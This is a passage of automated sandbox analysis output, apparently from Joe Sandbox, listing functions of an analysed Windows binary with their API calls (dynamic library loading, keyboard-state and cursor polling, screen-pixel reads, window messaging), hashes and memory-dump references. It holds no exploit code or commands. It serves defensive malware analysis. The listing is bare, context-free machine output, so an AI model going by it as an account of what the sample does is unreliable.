                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                        • String ID:
                                                                        • API String ID: 3440857362-0
                                                                        • Opcode ID: 8683e5562fd9d8e2c5a22bce6a67c6b2ee2c56164ddd0744fe62db46c6c69693
                                                                        • Instruction ID: e21528e8c7a6105b29b8cf60ce6c0aade197c130d52033aa257086839a8d33da
                                                                        • Opcode Fuzzy Hash: 8683e5562fd9d8e2c5a22bce6a67c6b2ee2c56164ddd0744fe62db46c6c69693
                                                                        • Instruction Fuzzy Hash: 33515F71218208AFDB04EF68C881FAAB7E9FF84314F44491DF59687291DB75E984CB52
                                                                        Function 0090D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0090D927
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0090D9AA
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0090D9C6
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0090DA07
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0090DA21
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008F7896,?,?,00000000), ref: 00895A2C
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008F7896,?,?,00000000,?,?), ref: 00895A50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow
                                                                        • String ID:
                                                                        • API String ID: 3910169830-0
                                                                        • Opcode ID: 132ae123a80992e04a741fad7b4549b8374f167f389f8c6822eb46fe4abb48d2
                                                                        • Instruction ID: 8a87e131877c1626fb857c0bb9c2d2ca2b565a4742210f77d288dfac316d5ace
                                                                        • Opcode Fuzzy Hash: 132ae123a80992e04a741fad7b4549b8374f167f389f8c6822eb46fe4abb48d2
                                                                        • Instruction Fuzzy Hash: F5511635A05209DFCB00EFA8C4959ADB7F9FF09320B188069E85AAB352D735AD45CF91
                                                                        Function 008FE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008FE61F
                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008FE648
                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008FE687
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008FE6AC
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008FE6B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow
                                                                        • String ID:
                                                                        • API String ID: 3440945829-0
                                                                        • Opcode ID: c32fbc7fb0429057e6dd46e1c87049bdcb08f8d3b726ba39a9b430dfd9cb5132
                                                                        • Instruction ID: ccc1f07647b1842890ab9ef5345c437e460f3662f9d6294d0e712a31b6acab9e
                                                                        • Opcode Fuzzy Hash: c32fbc7fb0429057e6dd46e1c87049bdcb08f8d3b726ba39a9b430dfd9cb5132
                                                                        • Instruction Fuzzy Hash: 73510735A001099FCF01EF68C981AAEBBF5FF09314B1880A9E959EB361DB35ED11DB51
                                                                        Function 0091A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9015662da232b0791bc3c28e8d39c1d8ddd1f634e1330bfabd6239ee2b605e39
                                                                        • Instruction ID: acc17c208e535380b75d6e09396aba6de2fbfcc504cec295b7d8f2b8bb17fb48
                                                                        • Opcode Fuzzy Hash: 9015662da232b0791bc3c28e8d39c1d8ddd1f634e1330bfabd6239ee2b605e39
                                                                        • Instruction Fuzzy Hash: 3C41B335B0E20CBFD711DB28CC58FE9BBA8EB09320F154565F916A72E1C730AD81EA51
                                                                        Function 00892344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 00892357
                                                                        • ScreenToClient.USER32(009557B0,?), ref: 00892374
                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00892399
                                                                        • GetAsyncKeyState.USER32(00000002), ref: 008923A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                        • String ID:
                                                                        • API String ID: 4210589936-0
                                                                        • Opcode ID: a13f8d6af41a6cadf854d1aa276b151f7dc95edd6ab8d0cbe6b4db588d2bc027
                                                                        • Instruction ID: 93e1913bf739b8d47524db3198393bfe6863fcd075a0c96c006ae91a72bb3900
                                                                        • Opcode Fuzzy Hash: a13f8d6af41a6cadf854d1aa276b151f7dc95edd6ab8d0cbe6b4db588d2bc027
                                                                        • Instruction Fuzzy Hash: DB418F35A08509FBCF159F68C844FE9BB74FB05364F24431AF828D22A0CB349990EB91
                                                                        Function 008E63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E63E7
                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 008E6433
                                                                        • TranslateMessage.USER32(?), ref: 008E645C
                                                                        • DispatchMessageW.USER32(?), ref: 008E6466
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008E6475
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                        • String ID:
                                                                        • API String ID: 2108273632-0
                                                                        • Opcode ID: a2667abb6e21d74c1934a7dd882839629aa0201ce03e8ad5a2a12e1125a41f2e
                                                                        • Instruction ID: cd3094f2413da90579bfbfe3af98686d0b143dc84cd7a0e5f85649e8be97ac04
                                                                        • Opcode Fuzzy Hash: a2667abb6e21d74c1934a7dd882839629aa0201ce03e8ad5a2a12e1125a41f2e
                                                                        • Instruction Fuzzy Hash: F031063161478AAFDB20CFB2CC54BF67BA8FB22389F144165E421C21A2F7359454E760
                                                                        Function 008C7AC8 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008C7AEF
                                                                        • _memset.LIBCMT ref: 008C7B1A
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,?,?), ref: 008C7B77
                                                                        • GetLastError.KERNEL32(?,?,00000000,?,?), ref: 008C7B93
                                                                        • _memset.LIBCMT ref: 008C7BA9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Locale_memset$ByteCharErrorLastMultiUpdateUpdate::_Wide
                                                                        • String ID:
                                                                        • API String ID: 742067911-0
                                                                        • Opcode ID: e454a6b51e0b3b38558e891410aba1986b076e79e9414e9c836557852b13fe80
                                                                        • Instruction ID: 6bf5b1c85034403f22456aceeeeb64b15a266bd2a03c06cc0bd8bbe6505ad039
                                                                        • Opcode Fuzzy Hash: e454a6b51e0b3b38558e891410aba1986b076e79e9414e9c836557852b13fe80
                                                                        • Instruction Fuzzy Hash: D331AB31608219AACB21AF589845FEE7B78FF42770F4441ADF824DB291DA30CD40CBA2
                                                                        Function 008E8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 008E8A30
                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 008E8ADA
                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008E8AE2
                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 008E8AF0
                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008E8AF8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        • Opcode ID: ed22a8c5182ebdc19a06217406545bb638f643d2d6658005d8e2feda1156951a
                                                                        • Instruction ID: 050593cf1efc7becb63d9d7cad8165544c2fabae12242896ae411ebedd6f5ec2
                                                                        • Opcode Fuzzy Hash: ed22a8c5182ebdc19a06217406545bb638f643d2d6658005d8e2feda1156951a
                                                                        • Instruction Fuzzy Hash: 5B31DF7150026DEFDB14CFA9D94CADE3BB5FB05315F10822AF928E61D0C7B09910DB91
                                                                        Function 008BB977 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _write_multi_char$_free_write_string
                                                                        • String ID:
                                                                        • API String ID: 687207756-0
                                                                        • Opcode ID: ced269b8da54f82a843379160ae8803784df4025d09283c5acf3315122e26136
                                                                        • Instruction ID: cfb574f6043ef45146be84394a5aca9a01b21c84d536887b9226bf47bdde2407
                                                                        • Opcode Fuzzy Hash: ced269b8da54f82a843379160ae8803784df4025d09283c5acf3315122e26136
                                                                        • Instruction Fuzzy Hash: 2131B7F1E011299ADF219A69CC41BEAB7B8FF08354F4440D9F708E2252E7719E948F69
                                                                        Function 008EB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 008EB204
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008EB221
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008EB259
                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008EB27F
                                                                        • _wcsstr.LIBCMT ref: 008EB289
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                        • String ID:
                                                                        • API String ID: 3902887630-0
                                                                        • Opcode ID: b294fcee4b32143d8d502297f5464ddea690f0c070ea76c41835af82e6432ca0
                                                                        • Instruction ID: b053aad98fe12d0bcd867552529f0f2599887238e73181d6428db0c5cf72a8e2
                                                                        • Opcode Fuzzy Hash: b294fcee4b32143d8d502297f5464ddea690f0c070ea76c41835af82e6432ca0
                                                                        • Instruction Fuzzy Hash: E321F9312042487BEB159B7ADC49EBF7B9CEF4A760F008139F905DA1A1EF61DC40E661
                                                                        Function 0091B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0091B192
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0091B1B7
                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0091B1CF
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0091B1F8
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00900E90,00000000), ref: 0091B216
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 2294984445-0
                                                                        • Opcode ID: 63f64d9c4566fdd53f8e1128b983e607ab722687474d47a6ab1f9ac1fa6eea11
                                                                        • Instruction ID: 1f27810cc6fea72333214d3753bd50fb88ba859731f25bf6d59bbc6105886419
                                                                        • Opcode Fuzzy Hash: 63f64d9c4566fdd53f8e1128b983e607ab722687474d47a6ab1f9ac1fa6eea11
                                                                        • Instruction Fuzzy Hash: 78219471B28659AFCB109F39DC18AAA37AAFB15361F154B24F932D71E0D7309850DB90
                                                                        Function 008E9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008E9320
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E9352
                                                                        • __itow.LIBCMT ref: 008E936A
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008E9392
                                                                        • __itow.LIBCMT ref: 008E93A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow$_memmove
                                                                        • String ID:
                                                                        • API String ID: 2983881199-0
                                                                        • Opcode ID: f119d4ab99bd01214d8ba4c5ec814f052aa4ced80e5e9e6ced39f330cbbd00b4
                                                                        • Instruction ID: 7d607a23c1e004f1b7518940aa60e7ce1134e4642f7a15088d60c4371008d36f
                                                                        • Opcode Fuzzy Hash: f119d4ab99bd01214d8ba4c5ec814f052aa4ced80e5e9e6ced39f330cbbd00b4
                                                                        • Instruction Fuzzy Hash: A121073170424CBBDB20AA699C85EEE7BACFB8A714F045025FD85D73C1D6F08D459792
                                                                        Function 00905A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindow.USER32(00000000), ref: 00905A6E
                                                                        • GetForegroundWindow.USER32 ref: 00905A85
                                                                        • GetDC.USER32(00000000), ref: 00905AC1
                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00905ACD
                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00905B08
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ForegroundPixelRelease
                                                                        • String ID:
                                                                        • API String ID: 4156661090-0
                                                                        • Opcode ID: 185c657fdbb26fcd8b7f4a8b5e2c5c8821ff3126c1e39b2267d308d35c6b6f68
                                                                        • Instruction ID: ca444f2638b40f29ad07169739723d168e72203715e8845fb9df0350a22c61db
                                                                        • Opcode Fuzzy Hash: 185c657fdbb26fcd8b7f4a8b5e2c5c8821ff3126c1e39b2267d308d35c6b6f68
                                                                        • Instruction Fuzzy Hash: 6A218436B00508AFDB14EF69DC95AAAB7E5EF48350F14C479F849D7351CA34AD00DB91
                                                                        Function 008912F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 0089134D
                                                                        • SelectObject.GDI32(?,00000000), ref: 0089135C
                                                                        • BeginPath.GDI32(?), ref: 00891373
                                                                        • SelectObject.GDI32(?,00000000), ref: 0089139C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: 3e4a37fcd381370d5b7febbddd6e5cef8769ab8d7801394efe361e3724aeba29
                                                                        • Instruction ID: debb84c8fb0b027556f7a3c5ebf460f148f9ada9c3730e1167ed1b327bb51a7a
                                                                        • Opcode Fuzzy Hash: 3e4a37fcd381370d5b7febbddd6e5cef8769ab8d7801394efe361e3724aeba29
                                                                        • Instruction Fuzzy Hash: D1219F30928709EBDF10DF16ED187A97BB8FB10326F188215E911D62B1C7759891FF40
                                                                        Function 008EBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID:
                                                                        • API String ID: 2931989736-0
                                                                        • Opcode ID: 03ce6f0d2a59bf75b488ffc4147c9a2ec9630a38f82ea1a656cb3d5627969c50
                                                                        • Instruction ID: 9385a6b85f9d74eaf6f0516eb8c89d0b8fca70c511499a5399c26479a597c5a6
                                                                        • Opcode Fuzzy Hash: 03ce6f0d2a59bf75b488ffc4147c9a2ec9630a38f82ea1a656cb3d5627969c50
                                                                        • Instruction Fuzzy Hash: 4601CCB22041597AD600AB16AD82FFBA35DFF6238CF144420FD04DA347EB20EE1086A6
                                                                        Function 008F4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 008F4ABA
                                                                        • __beginthreadex.LIBCMT ref: 008F4AD8
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 008F4AED
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008F4B03
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008F4B0A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
